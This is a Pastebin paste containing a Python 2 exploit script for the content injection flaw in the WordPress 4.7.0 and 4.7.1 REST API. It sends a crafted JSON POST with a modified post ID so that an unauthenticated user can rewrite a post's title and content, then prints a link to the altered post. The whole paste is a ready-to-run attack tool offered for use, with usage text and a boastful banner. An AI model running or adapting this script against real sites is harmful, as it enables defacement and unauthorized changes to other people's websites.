Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- """
- Wordpress Content Injection Exploit | 4.7.0 & 4.7.1
- Usage: wp-content-injection.py --url http://127.0.0.1/wordpress/index.php/wp-json/wp/v2/posts/6 --title "rekt" --content "rip"
- Options:
- -h, --help show this help message and exit
- -u URL, --url=URL Specify the URL
- -t TITLE, --title=TITLE Specify the Page Title
- -c CONTENT, --content=CONTENT Specify the Page Content
- """
- # Exploit Title: WP Content Injection Exploit
- # Date: 02-02-2017
- # Author: GasGeverij
- # Version: Wordpress 4.7.0 & 4.7.1
- # by: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
- import json
- import requests
- import optparse
- import sys
- from urlparse import urlparse
- import time
- script = sys.argv[0]
- def getPid(url):
- l = url.split('/')
- getpid = l[l.index('posts') + 1]
- return getpid
- def getDomain(url):
- parsed_uri = urlparse(url)
- domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
- return domain
- def banner():
- return """
- ********************************************************
- * _ _______ ______ _____ _____ _____ _____ *
- *| | | | ___ \ | ___ \ _ / ___|_ _| |_ _| *
- *| | | | |_/ /_____| |_/ / | | \ `--. | |______| | *
- *| |/\| | __/______| __/| | | |`--. \ | |______| | *
- *\ /\ / | | | \ \_/ /\__/ / | | _| |_ *
- * \/ \/\_| \_| \___/\____/ \_/ \___/ *
- * *
- ********************************************************
- Cringe.
- """
- def main():
- parser = optparse.OptionParser("Usage: "+script+" -u <URL> --title \"<PAGE_TITLE>\" --content \"<PAGE_CONTENT>\"")
- parser.add_option("-u", "--url", dest="URL", type="string", help="Specify the URL")
- parser.add_option("-t", "--title", dest="TITLE", type="string", help="Specify the Page Title")
- parser.add_option("-c", "--content", dest="CONTENT", type="string", help="Specify the Page Content")
- (options, args) = parser.parse_args()
- url = options.URL
- title = options.TITLE
- content = options.CONTENT
- data = {"id" : ""+str(getPid(url))+"textappendshere", "title" : ""+title+"", "content" : ""+content+""}
- headers = {'Content-Type': "application/json; charset=xxxe", 'Accept': "application/json"}
- res = requests.post(url, data=json.dumps(data), headers=headers)
- resp = res.status_code
- print banner()
- print "Status Code: "+str(resp)
- print time.sleep(2)
- if str(resp) == "200":
- print "Yeyeye!"
- print "[+] Exploiting .. "
- print "[+] check the post.."
- print "[+] "+getDomain(url)+"?p="+getPid(url)
- else:
- print "May not be vulnerable?"
- if __name__ == '__main__':
- try:
- main()
- except KeyboardInterrupt:
- print "[-] Abort. User stopped the script."
- sys.exit(0)
- except:
- pass
Add Comment
Please, Sign In to add comment